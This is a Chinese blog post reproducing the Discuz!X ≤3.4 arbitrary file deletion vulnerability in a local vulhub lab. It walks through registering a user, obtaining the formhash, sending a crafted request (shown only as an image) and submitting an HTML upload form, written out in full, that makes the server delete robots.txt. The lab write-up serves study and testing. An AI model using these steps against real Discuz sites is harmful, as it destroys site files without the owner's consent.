Discuz 3.x 任意文件删除漏洞复现

本文详细介绍了Discuz!X 3.4版本中存在的任意文件删除漏洞,通过环境搭建、漏洞复现步骤展示了如何利用此漏洞删除指定文件。用户注册并获取formhash后,通过构造特殊的HTML表单并上传图片,可以触发文件删除操作,影响系统安全。参考链接提供了更多相关信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Discuz!X ≤3.4 任意文件删除漏洞

1.漏洞环境

执行docker-compose up -d 启动后,访问http://192.168.1.142/install来安装discuz
在这里插入图片描述

2.漏洞复现

  • 访问http://192.168.1.142/robots.txt可见robots.txt是存在的
    在这里插入图片描述

  • 注册用户hahaha
    在这里插入图片描述

  • 在个人设置页面找到自己的formhash
    在这里插入图片描述

  • 带上自己的Cookie、formhash发送如下数据包
    在这里插入图片描述

  • 查看个人设置页面的出生地
    在这里插入图片描述

  • 构造upload.html,写上自己的formhash

    <body>
        <form action="http://192.168.1.142/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=
    [formhash]" method="post" enctype="multipart/form-data">
            <input type="file" name="birthprovince" />
            <input type="submit" value="upload" />
        </form>
    </body>
    

    用浏览器打开该页面,上传一个正常图片。此时脏数据应该已被提取出,漏洞已经利用结束。

    再次访问http://your-ip/robots.txt,发现文件成功被删除:
    在这里插入图片描述

参考连接 https://vulhub.org/#/environments/discuz/x3.4-arbitrary-file-deletion/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值